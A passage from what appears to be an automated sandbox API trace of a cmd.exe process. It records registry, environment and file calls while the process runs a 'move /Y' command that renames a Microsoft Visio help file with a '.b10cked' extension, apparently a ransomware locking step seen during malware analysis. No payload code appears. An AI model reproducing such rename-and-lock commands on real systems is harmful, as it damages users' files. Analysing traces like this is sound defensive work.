region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29675 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 29676 start_va = 0x4d0000 end_va = 0x10cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 29677 start_va = 0x10d0000 end_va = 0x1232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 29678 start_va = 0x1240000 end_va = 0x1240fff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 29679 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 29683 start_va = 0x1260000 end_va = 0x131ffff entry_point = 0x1260000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 674 os_tid = 0x608 [0201.711] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fadc | out: lpSystemTimeAsFileTime=0x12fadc*(dwLowDateTime=0xad09d360, dwHighDateTime=0x1d440a9)) [0201.711] GetCurrentProcessId () returned 0xda8 [0201.711] GetCurrentThreadId () returned 0x608 [0201.711] GetTickCount () returned 0x38f43 [0201.711] QueryPerformanceCounter (in: lpPerformanceCount=0x12fad4 | out: lpPerformanceCount=0x12fad4*=25850055382) returned 1 [0201.712] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.712] __set_app_type (_Type=0x1) [0201.712] __p__fmode () returned 0x76b331f4 [0201.712] __p__commode () returned 0x76b331fc [0201.712] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.713] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: 
_Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.713] GetCurrentThreadId () returned 0x608 [0201.713] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x608) returned 0x38 [0201.713] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.713] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.713] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.716] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa6c | out: phkResult=0x12fa6c*=0x0) returned 0x2 [0201.716] VirtualQuery (in: lpAddress=0x12faa3, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.716] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa3c, dwLength=0x1c | out: lpBuffer=0x12fa3c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, 
State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.716] GetConsoleOutputCP () returned 0x1b5 [0201.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.718] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.718] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.719] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.719] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.724] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.726] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.726] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.752] GetEnvironmentStringsW () returned 0x1e0180* [0201.752] FreeEnvironmentStringsW (penv=0x1e0180) returned 1 [0201.753] GetEnvironmentStringsW () returned 0x1e0180* [0201.753] FreeEnvironmentStringsW (penv=0x1e0180) returned 1 [0201.753] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0xa8, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegCloseKey (hKey=0x40) returned 0x0 [0201.753] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9dc | out: phkResult=0x12e9dc*=0x40) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x40, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: 
lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x1, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x0, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x4, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x4) returned 0x0 [0201.753] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9e4, lpData=0x12e9e8, lpcbData=0x12e9e0*=0x1000 | out: lpType=0x12e9e4*=0x0, lpData=0x12e9e8*=0x9, lpcbData=0x12e9e0*=0x1000) returned 0x2 [0201.753] RegCloseKey (hKey=0x40) returned 0x0 [0201.753] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.753] srand (_Seed=0x5b8863a3) [0201.753] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"" [0201.753] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"" [0201.754] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.754] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.754] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.754] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.754] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.754] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.754] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.754] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.754] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.754] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.754] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.754] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.754] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.754] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.754] GetEnvironmentStringsW () returned 0x1e22d0* [0201.754] FreeEnvironmentStringsW (penv=0x1e22d0) returned 1 [0201.754] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.754] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.754] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.755] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.755] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.755] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.755] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.755] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.755] _wcsicmp (_String1="KEYS", _String2="RANDOM") 
returned -7 [0201.755] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.755] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.755] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7a8, lpFilePart=0x12f7a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7a4*="Desktop") returned 0x18 [0201.755] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.755] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x1e0010 [0201.755] FindClose (in: hFindFile=0x1e0010 | out: hFindFile=0x1e0010) returned 1 [0201.755] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x1e0010 [0201.755] FindClose (in: hFindFile=0x1e0010 | out: hFindFile=0x1e0010) returned 1 [0201.755] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f524 | out: lpFindFileData=0x12f524) returned 0x1e0010 [0201.755] FindClose (in: hFindFile=0x1e0010 | out: hFindFile=0x1e0010) returned 1 [0201.755] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.756] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.756] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.756] GetEnvironmentStringsW () returned 0x1e2af0* [0201.756] FreeEnvironmentStringsW (penv=0x1e2af0) returned 1 [0201.756] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.756] GetConsoleOutputCP () returned 0x1b5 [0201.765] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0201.765] GetUserDefaultLCID () returned 0x409 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="0") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8e8, cchData=128 | out: lpLCData="1") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.769] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.769] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.770] GetConsoleTitleW (in: lpConsoleTitle=0x1d08e0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.793] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.793] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.793] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.794] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.794] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.794] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.794] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.794] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.794] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.794] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.794] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.797] GetConsoleTitleW (in: lpConsoleTitle=0x12f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.827] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.827] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.827] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.827] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.827] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.827] _wcsicmp 
(_String1="move", _String2="PROMPT") returned -3 [0201.827] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.827] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.827] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.827] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.827] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.827] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.827] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.827] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.827] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.827] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.827] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.827] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.827] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.827] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.827] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.827] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.829] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.829] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f39c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f394, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f394*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", 
_MaxCount=0x7) returned 38 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.829] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 
[0201.830] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.830] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.831] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.831] _wcsicmp (_String1="MSVISI~1.HXN", _String2=".") returned 63 [0201.831] _wcsicmp (_String1="MSVISI~1.HXN", _String2="..") returned 63 [0201.831] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~1.hxn")) returned 0x2022 [0201.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1e1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.831] SetErrorMode (uMode=0x0) returned 0x0 [0201.831] SetErrorMode (uMode=0x1) returned 0x0 [0201.831] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", nBufferLength=0x104, lpBuffer=0x12ed24, lpFilePart=0x12ed0c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", lpFilePart=0x12ed0c*="MSVISI~1.HXN") returned 0x27 [0201.831] SetErrorMode (uMode=0x0) returned 0x1 [0201.831] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.831] _wcsicmp (_String1="MSVISI~1.HXN", _String2=".") returned 63 [0201.831] _wcsicmp 
(_String1="MSVISI~1.HXN", _String2="..") returned 63 [0201.831] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~1.hxn")) returned 0x2022 [0201.831] SetErrorMode (uMode=0x0) returned 0x0 [0201.831] SetErrorMode (uMode=0x1) returned 0x0 [0201.832] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", nBufferLength=0x104, lpBuffer=0x12f1a0, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", lpFilePart=0x12ef38*="MSVISI~1.HXN") returned 0x27 [0201.832] SetErrorMode (uMode=0x0) returned 0x1 [0201.832] SetErrorMode (uMode=0x0) returned 0x0 [0201.832] SetErrorMode (uMode=0x1) returned 0x0 [0201.832] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f3a8, lpFilePart=0x12ef38 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked", lpFilePart=0x12ef38*="MS.VISIO.14.1033.hxn.b10cked") returned 0x37 [0201.832] SetErrorMode (uMode=0x0) returned 0x1 [0201.832] SetLastError (dwErrCode=0x0) [0201.832] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio.14.1033.hxn.b10cked")) returned 0xffffffff [0201.832] GetLastError () returned 0x2 [0201.832] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e8b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8b4) returned 